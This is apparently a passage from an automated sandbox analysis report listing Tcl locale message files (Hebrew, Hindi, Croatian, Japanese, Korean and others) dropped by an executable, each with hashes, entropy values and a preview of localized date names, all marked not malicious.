                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset gv_GB DATE_FORMAT "%d %B %Y". ::msgcat::mcset gv_GB TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset gv_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\he.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1938
                                                                                                                                                                                                                                                    Entropy (8bit):4.234997703698801
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8Hdd4CLxLtmCLoCLHCL3CLXLICLP1ptzLzCJCLt5LL53h5Lq+p5LcL3pLzCt:4655ftB9hMcGlhO8/n/0ecOfC3
                                                                                                                                                                                                                                                    MD5:FFD5D8007D78770EA0E7E5643F1BD20A
                                                                                                                                                                                                                                                    SHA1:40854EB81EE670086D0D0C0C2F0F9D8406DF6B47
                                                                                                                                                                                                                                                    SHA-256:D27ADAF74EBB18D6964882CF931260331B93AE4B283427F9A0DB147A83DE1D55
                                                                                                                                                                                                                                                    SHA-512:EFBDADE1157C7E1CB8458CBA89913FB44DC2399AD860FCAEDA588B99230B0934EDAAF8BAB1742E03F06FA8047D3605E8D63BB23EC4B32155C256D07C46ABBFEE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset he DAYS_OF_WEEK_ABBREV [list \. "\u05d0"\. "\u05d1"\. "\u05d2"\. "\u05d3"\. "\u05d4"\. "\u05d5"\. "\u05e9"]. ::msgcat::mcset he DAYS_OF_WEEK_FULL [list \. "\u05d9\u05d5\u05dd \u05e8\u05d0\u05e9\u05d5\u05df"\. "\u05d9\u05d5\u05dd \u05e9\u05e0\u05d9"\. "\u05d9\u05d5\u05dd \u05e9\u05dc\u05d9\u05e9\u05d9"\. "\u05d9\u05d5\u05dd \u05e8\u05d1\u05d9\u05e2\u05d9"\. "\u05d9\u05d5\u05dd \u05d7\u05de\u05d9\u05e9\u05d9"\. "\u05d9\u05d5\u05dd \u05e9\u05d9\u05e9\u05d9"\. "\u05e9\u05d1\u05ea"]. ::msgcat::mcset he MONTHS_ABBREV [list \. "\u05d9\u05e0\u05d5"\. "\u05e4\u05d1\u05e8"\. "\u05de\u05e8\u05e5"\. "\u05d0\u05e4\u05e8"\. "\u05de\u05d0\u05d9"\. "\u05d9\u05d5\u05e0"\. "\u05d9\u05d5\u05dc"\. "\u05d0\u05d5\u05d2"\. "\u05e1\u05e4\u05d8"\.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\hi.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1738
                                                                                                                                                                                                                                                    Entropy (8bit):4.1505681803025185
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8dVYe48VcOVcz1HtDVcqiVca4mGE18VcRBkEVcRfVcRMsVcqiVca4mGE18VI:465v4bNVO7GQbBkDuM4O7GQbBkDuh3x
                                                                                                                                                                                                                                                    MD5:349823390798DF68270E4DB46C3CA863
                                                                                                                                                                                                                                                    SHA1:814F9506FCD8B592C22A47023E73457C469B2F53
                                                                                                                                                                                                                                                    SHA-256:FAFE65DB09BDCB863742FDA8705BCD1C31B59E0DD8A3B347EA6DEC2596CEE0E9
                                                                                                                                                                                                                                                    SHA-512:4D12213EA9A3EAD6828E21D3B5B73931DC922EBE8FD2373E3A3E106DF1784E0BCE2C9D1FBEAE0D433449BE6D28A0F2F50F49AB8C208E69D413C6787ADF52915E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hi DAYS_OF_WEEK_FULL [list \. "\u0930\u0935\u093f\u0935\u093e\u0930"\. "\u0938\u094b\u092e\u0935\u093e\u0930"\. "\u092e\u0902\u0917\u0932\u0935\u093e\u0930"\. "\u092c\u0941\u0927\u0935\u093e\u0930"\. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\. "\u0936\u0928\u093f\u0935\u093e\u0930"]. ::msgcat::mcset hi MONTHS_ABBREV [list \. "\u091c\u0928\u0935\u0930\u0940"\. "\u092b\u093c\u0930\u0935\u0930\u0940"\. "\u092e\u093e\u0930\u094d\u091a"\. "\u0905\u092a\u094d\u0930\u0947\u0932"\. "\u092e\u0908"\. "\u091c\u0942\u0928"\. "\u091c\u0941\u0932\u093e\u0908"\. "\u0905\u0917\u0938\u094d\u0924"\. "\u0938\u093f\u0924\u092e\u094d\u092c\u0930"\. "\u0905\u0915\u094d\u091f\u0942\u092c\u0930"\. "\u0928\u0935\u092e\u094d\u092c\u093

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\hi_in.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.882853646266983
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmocv+9/Loz3v6rZoco+3v+6f6HK:4EnLzu8+vWq3v6rpF3vmq
                                                                                                                                                                                                                                                    MD5:BC86C58492BCB8828489B871D2A727F0
                                                                                                                                                                                                                                                    SHA1:22EEC74FC011063071A40C3860AE8EF38D898582
                                                                                                                                                                                                                                                    SHA-256:29C7CA358FFFCAF94753C7CC2F63B58386234B75552FA3272C2E36F253770C3F
                                                                                                                                                                                                                                                    SHA-512:ABFE093952144A285F7A86800F5933F7242CB224D917B4BAA4FD2CA48792BEFCBEE9AB7073472510B53D31083719EC68A77DD896410B3DC3C6E2CCD60C2E92F9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hi_IN DATE_FORMAT "%d %M %Y". ::msgcat::mcset hi_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset hi_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\hr.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1121
                                                                                                                                                                                                                                                    Entropy (8bit):4.291836444825864
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu84VBVgqoLpYDThoLZDT25KNWg1gqNvEKvOAl:46nNYPSLZP2ZVqJTO+
                                                                                                                                                                                                                                                    MD5:46FD3DF765F366C60B91FA0C4DE147DE
                                                                                                                                                                                                                                                    SHA1:5E006D1ACA7BBDAC9B8A65EFB26FAFC03C6E9FDE
                                                                                                                                                                                                                                                    SHA-256:9E14D8F7F54BE953983F198C8D59F38842C5F73419A5E81BE6460B3623E7307A
                                                                                                                                                                                                                                                    SHA-512:3AC26C55FB514D9EA46EF57582A2E0B64822E90C889F4B83A62EE255744FEBE0A012079DD764E0F6C7338B3580421C5B6C8575E0B85632015E3689CF58D9EB77
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hr DAYS_OF_WEEK_ABBREV [list \. "ned"\. "pon"\. "uto"\. "sri"\. "\u010det"\. "pet"\. "sub"]. ::msgcat::mcset hr DAYS_OF_WEEK_FULL [list \. "nedjelja"\. "ponedjeljak"\. "utorak"\. "srijeda"\. "\u010detvrtak"\. "petak"\. "subota"]. ::msgcat::mcset hr MONTHS_ABBREV [list \. "sij"\. "vel"\. "o\u017eu"\. "tra"\. "svi"\. "lip"\. "srp"\. "kol"\. "ruj"\. "lis"\. "stu"\. "pro"\. ""]. ::msgcat::mcset hr MONTHS_FULL [list \. "sije\u010danj"\. "velja\u010da"\. "o\u017eujak"\. "travanj"\. "svibanj"\. "lipanj"\. "srpanj"\. "kolovoz"\. "rujan"\. "listopad"\. "studeni"\. "prosinac"\. ""]. ::msgcat::mcset hr DATE_FORMAT "

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\hu.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1327
                                                                                                                                                                                                                                                    Entropy (8bit):4.447184847972284
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8Xjv5ZemNruwcVNtZHTE9wocxPvt9vq:46fBZemNqwIZHTEE3t5q
                                                                                                                                                                                                                                                    MD5:0561E62941F6ED8965DFC4E2B424E028
                                                                                                                                                                                                                                                    SHA1:C622B21C0DBA83F943FBD10C746E5FABE20235B2
                                                                                                                                                                                                                                                    SHA-256:314F4180C05DE4A4860F65AF6460900FFF77F12C08EDD728F68CA0065126B9AE
                                                                                                                                                                                                                                                    SHA-512:CAD01C963145463612BBAE4B9F5C80B83B228C0181C2500CE8CE1394E1A32CCA3587221F1406F6343029059F5AD47E8FD5514535DCEA45BBA6B2AE76993DFFBD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hu DAYS_OF_WEEK_ABBREV [list \. "V"\. "H"\. "K"\. "Sze"\. "Cs"\. "P"\. "Szo"]. ::msgcat::mcset hu DAYS_OF_WEEK_FULL [list \. "vas\u00e1rnap"\. "h\u00e9tf\u0151"\. "kedd"\. "szerda"\. "cs\u00fct\u00f6rt\u00f6k"\. "p\u00e9ntek"\. "szombat"]. ::msgcat::mcset hu MONTHS_ABBREV [list \. "jan."\. "febr."\. "m\u00e1rc."\. "\u00e1pr."\. "m\u00e1j."\. "j\u00fan."\. "j\u00fal."\. "aug."\. "szept."\. "okt."\. "nov."\. "dec."\. ""]. ::msgcat::mcset hu MONTHS_FULL [list \. "janu\u00e1r"\. "febru\u00e1r"\. "m\u00e1rcius"\. "\u00e1prilis"\. "m\u00e1jus"\. "j\u00fanius"\. "j\u00falius"\. "augusztus"\. "szeptember"\. "okt\u00f3ber"\. "nove

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\id.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                    Entropy (8bit):3.9322448438499125
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8acGEXctI9tdb/7579g6tdhUgQbVg:46GBEXKI9tdHtdwg
                                                                                                                                                                                                                                                    MD5:CE834C7E0C3170B733122FF8BF38C28D
                                                                                                                                                                                                                                                    SHA1:693ACC2A0972156B984106AFD07911AF14C4F19C
                                                                                                                                                                                                                                                    SHA-256:1F1B0F5DEDE0263BD81773A78E98AF551F36361ACCB315B618C8AE70A5FE781E
                                                                                                                                                                                                                                                    SHA-512:23BFC6E2CDB7BA75AAC3AA75869DF4A235E4526E8E83D73551B3BC2CE89F3675EBFA75BC94177F2C2BD6AC58C1B125BE65F8489BC4F85FA701415DB9768F7A80
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset id DAYS_OF_WEEK_ABBREV [list \. "Min"\. "Sen"\. "Sel"\. "Rab"\. "Kam"\. "Jum"\. "Sab"]. ::msgcat::mcset id DAYS_OF_WEEK_FULL [list \. "Minggu"\. "Senin"\. "Selasa"\. "Rabu"\. "Kamis"\. "Jumat"\. "Sabtu"]. ::msgcat::mcset id MONTHS_ABBREV [list \. "Jan"\. "Peb"\. "Mar"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Agu"\. "Sep"\. "Okt"\. "Nov"\. "Des"\. ""]. ::msgcat::mcset id MONTHS_FULL [list \. "Januari"\. "Pebruari"\. "Maret"\. "April"\. "Mei"\. "Juni"\. "Juli"\. "Agustus"\. "September"\. "Oktober"\. "November"\. "Desember"\. ""].}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\id_id.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.857986813915644
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmo0kGvNLo0F/W3v6aZo0kT+3vR6HK:4EnLzu8NGvNS3v6aQK3voq
                                                                                                                                                                                                                                                    MD5:A285817AAABD5203706D5F2A34158C03
                                                                                                                                                                                                                                                    SHA1:18FD0178051581C9F019604499BF91B16712CC91
                                                                                                                                                                                                                                                    SHA-256:DB81643BA1FD115E9D547943A889A56DFC0C81B63F21B1EDC1955C6884C1B2F5
                                                                                                                                                                                                                                                    SHA-512:0B6C684F2E5122681309A6212980C95C14172723F12D4864AF8A8A913DC7081BC42AC39CF087D29770B4A1F0B3B1F712856CBF05D1975FFFC008C16A91081A00
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset id_ID DATE_FORMAT "%d %B %Y". ::msgcat::mcset id_ID TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset id_ID DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\is.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1255
                                                                                                                                                                                                                                                    Entropy (8bit):4.391152464169964
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8qVXVDWpXMVmDz1ZVcWVzbQ1/xZ9b3eYXvhv3eT3:462hVW5JDz1ZVUbpfV83
                                                                                                                                                                                                                                                    MD5:6695839F1C4D2A92552CB1647FD14DA5
                                                                                                                                                                                                                                                    SHA1:04CB1976846A78EA9593CB3706C9D61173CE030C
                                                                                                                                                                                                                                                    SHA-256:6767115FFF2DA05F49A28BAD78853FAC6FC716186B985474D6D30764E1727C40
                                                                                                                                                                                                                                                    SHA-512:208766038A6A1D748F4CB2660F059AD355A5439EA6D8326F4F410B2DFBBDEECB55D4CE230C01C519B08CAB1CF5E5B3AC61E7BA86020A7BDA1AFEA624F3828521
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset is DAYS_OF_WEEK_ABBREV [list \. "sun."\. "m\u00e1n."\. "\u00feri."\. "mi\u00f0."\. "fim."\. "f\u00f6s."\. "lau."]. ::msgcat::mcset is DAYS_OF_WEEK_FULL [list \. "sunnudagur"\. "m\u00e1nudagur"\. "\u00feri\u00f0judagur"\. "mi\u00f0vikudagur"\. "fimmtudagur"\. "f\u00f6studagur"\. "laugardagur"]. ::msgcat::mcset is MONTHS_ABBREV [list \. "jan."\. "feb."\. "mar."\. "apr."\. "ma\u00ed"\. "j\u00fan."\. "j\u00fal."\. "\u00e1g\u00fa."\. "sep."\. "okt."\. "n\u00f3v."\. "des."\. ""]. ::msgcat::mcset is MONTHS_FULL [list \. "jan\u00faar"\. "febr\u00faar"\. "mars"\. "apr\u00edl"\. "ma\u00ed"\. "j\u00fan\u00ed"\. "j\u00fal\u00ed"\. "\u00e1g\u00fast"\.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\it.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1240
                                                                                                                                                                                                                                                    Entropy (8bit):4.207511774275323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8iYJcc8jYShjLhQ6I3S68gvNvlNUhsFNlVGvNmv5svc:46Wi38jBJLhQ6I3EgFtNo4NlVGlw5Kc
                                                                                                                                                                                                                                                    MD5:8E205D032206D794A681E2A994532FA6
                                                                                                                                                                                                                                                    SHA1:47098672D339624474E8854EB0512D54A0CA49E7
                                                                                                                                                                                                                                                    SHA-256:C7D84001855586A0BAB236A6A5878922D9C4A2EA1799BF18544869359750C0DF
                                                                                                                                                                                                                                                    SHA-512:139219DBD014CCA15922C45C7A0468F62E864F18CC16C7B8506258D1ECD766E1EFF6EAE4DFDAF72898B9AF1A5E6CE8D7BB0F1A93A6604D2539F2645C9ED8D146
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset it DAYS_OF_WEEK_ABBREV [list \. "dom"\. "lun"\. "mar"\. "mer"\. "gio"\. "ven"\. "sab"]. ::msgcat::mcset it DAYS_OF_WEEK_FULL [list \. "domenica"\. "luned\u00ec"\. "marted\u00ec"\. "mercoled\u00ec"\. "gioved\u00ec"\. "venerd\u00ec"\. "sabato"]. ::msgcat::mcset it MONTHS_ABBREV [list \. "gen"\. "feb"\. "mar"\. "apr"\. "mag"\. "giu"\. "lug"\. "ago"\. "set"\. "ott"\. "nov"\. "dic"\. ""]. ::msgcat::mcset it MONTHS_FULL [list \. "gennaio"\. "febbraio"\. "marzo"\. "aprile"\. "maggio"\. "giugno"\. "luglio"\. "agosto"\. "settembre"\. "ottobre"\. "novembre"\. "dicembre"\. ""]. ::msgcat::mcset it BCE "aC". ::msgc

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\it_ch.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):244
                                                                                                                                                                                                                                                    Entropy (8bit):4.851375233848049
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoi5jLWNLoyJ+3vULoia+3vjLtA6:4EnLzu8m3WNJ+3v23v3t3
                                                                                                                                                                                                                                                    MD5:8666E24230AED4DC76DB93BE1EA07FF6
                                                                                                                                                                                                                                                    SHA1:7C688C8693C76AEE07FB32637CD58E47A85760F3
                                                                                                                                                                                                                                                    SHA-256:2EE356FFA2491A5A60BDF7D7FEBFAC426824904738615A0C1D07AEF6BDA3B76F
                                                                                                                                                                                                                                                    SHA-512:BCCE87FB94B28B369B9EE48D792A399DB8250D0D3D73FC05D053276A7475229EF1555D5E516D780092496F0E5F229A9912A45FB5A88C024FCEBF08E654D37B07
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset it_CH DATE_FORMAT "%e. %B %Y". ::msgcat::mcset it_CH TIME_FORMAT "%H:%M:%S". ::msgcat::mcset it_CH DATE_TIME_FORMAT "%e. %B %Y %H:%M:%S %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\ja.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1664
                                                                                                                                                                                                                                                    Entropy (8bit):4.88149888596689
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8VcQHxbtVLKMwvtFwvQv4fTweLvDvTwS0Zu+jqgv:46RbItt4mCEebzES0njqq
                                                                                                                                                                                                                                                    MD5:430DEB41034402906156D7E23971CD2C
                                                                                                                                                                                                                                                    SHA1:0952FFBD241B5111714275F5CD8FB5545067FFEC
                                                                                                                                                                                                                                                    SHA-256:38DCA9B656241884923C451A369B90A9F1D76F9029B2E98E04784323169C3251
                                                                                                                                                                                                                                                    SHA-512:AE5DF1B79AE34DF4CC1EB00406FFF49541A95E2C732E3041CCE321F2F3FA6461BB45C6524A5FEB77E18577206CBD88A83FBF20B4B058BAE9B889179C93221557
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ja DAYS_OF_WEEK_ABBREV [list \. "\u65e5"\. "\u6708"\. "\u706b"\. "\u6c34"\. "\u6728"\. "\u91d1"\. "\u571f"]. ::msgcat::mcset ja DAYS_OF_WEEK_FULL [list \. "\u65e5\u66dc\u65e5"\. "\u6708\u66dc\u65e5"\. "\u706b\u66dc\u65e5"\. "\u6c34\u66dc\u65e5"\. "\u6728\u66dc\u65e5"\. "\u91d1\u66dc\u65e5"\. "\u571f\u66dc\u65e5"]. ::msgcat::mcset ja MONTHS_FULL [list \. "1\u6708"\. "2\u6708"\. "3\u6708"\. "4\u6708"\. "5\u6708"\. "6\u6708"\. "7\u6708"\. "8\u6708"\. "9\u6708"\. "10\u6708"\. "11\u6708"\. "12\u6708"]. ::msgcat::mcset ja BCE "\u7d00\u5143\u524d". ::msgcat::mcset ja CE "\u897f\u66a6". ::msgcat::mcset ja AM "\u5348\u524d". ::msgcat::mcset ja PM "\u5348\u5f8c". ::msgcat::mcset ja DATE_FORMAT "%Y/%m/%

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\kl.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):978
                                                                                                                                                                                                                                                    Entropy (8bit):4.013253613061898
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu83jGeo9sbjCjS3jCwjLj+zSsS9CfzTA2Qcl:46OOsJzTvl
                                                                                                                                                                                                                                                    MD5:AE55E001BBE3272CE13369C836139EF3
                                                                                                                                                                                                                                                    SHA1:D912A0AEBA08BC97D80E9B7A55CE146956C90BCC
                                                                                                                                                                                                                                                    SHA-256:1B00229DF5A979A040339BBC72D448F39968FEE5CC24F07241C9F6129A9B53DD
                                                                                                                                                                                                                                                    SHA-512:E53E8DB56AD367E832A121D637CA4755E6C8768C063E4BE43E6193C5F71ED7AA10F7223AC85750C0CAD543CF4A0BFE578CBA2877F176A5E58DCA2BAA2F7177FB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kl DAYS_OF_WEEK_ABBREV [list \. "sab"\. "ata"\. "mar"\. "pin"\. "sis"\. "tal"\. "arf"]. ::msgcat::mcset kl DAYS_OF_WEEK_FULL [list \. "sabaat"\. "ataasinngorneq"\. "marlunngorneq"\. "pingasunngorneq"\. "sisamanngorneq"\. "tallimanngorneq"\. "arfininngorneq"]. ::msgcat::mcset kl MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset kl MONTHS_FULL [list \. "januari"\. "februari"\. "martsi"\. "aprili"\. "maji"\. "juni"\. "juli"\. "augustusi"\. "septemberi"\. "oktoberi"\. "novemberi"\. "decemberi"\. ""].}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\kl_gl.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):279
                                                                                                                                                                                                                                                    Entropy (8bit):4.83493357349932
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoEpb53FD/LoEpLE3vG5oEpLE3v6X5oEpba+3vnFDoAov:4EnLzu8KF3FD/1w3vMw3v6T/3v9dy
                                                                                                                                                                                                                                                    MD5:4B8E5B6EB7C27A02DBC0C766479B068D
                                                                                                                                                                                                                                                    SHA1:E97A948FFE6C8DE99F91987155DF0A81A630950E
                                                                                                                                                                                                                                                    SHA-256:F99DA45138A8AEBFD92747FC28992F0C315C6C4AD97710EAF9427263BFFA139C
                                                                                                                                                                                                                                                    SHA-512:D726494A6F4E1FB8C71B8B56E9B735C1837D8D22828D006EF386E41AD15CD1E4CF14DAC01966B9AFE41F7B6A44916EFC730CF038B4EC393043AE9021D11DACF2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kl_GL DATE_FORMAT "%d %b %Y". ::msgcat::mcset kl_GL TIME_FORMAT "%T". ::msgcat::mcset kl_GL TIME_FORMAT_12 "%T". ::msgcat::mcset kl_GL DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\ko.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1566
                                                                                                                                                                                                                                                    Entropy (8bit):4.552910804130986
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8cVBfHVnYgY+YGkYeY02Y7YkMXjDHMXjqKKyvtuvFd8vUPvwEq:46ojlmpYEY7XjDsXj+0t4zaU3wt
                                                                                                                                                                                                                                                    MD5:A4C37AF81FC4AA6003226A95539546C1
                                                                                                                                                                                                                                                    SHA1:A18A7361783896C691BD5BE8B3A1FCCCCB015F43
                                                                                                                                                                                                                                                    SHA-256:F6E2B0D116D2C9AC90DDA430B6892371D87A4ECFB6955318978ED6F6E9D546A6
                                                                                                                                                                                                                                                    SHA-512:FBE6BA258C250BD90FADCC42AC18A17CC4E7B040F160B94075AF1F42ECD43EEA6FE49DA52CF9B5BBB5D965D6AB7C4CC4053A78E865241F891E13F94EB20F0472
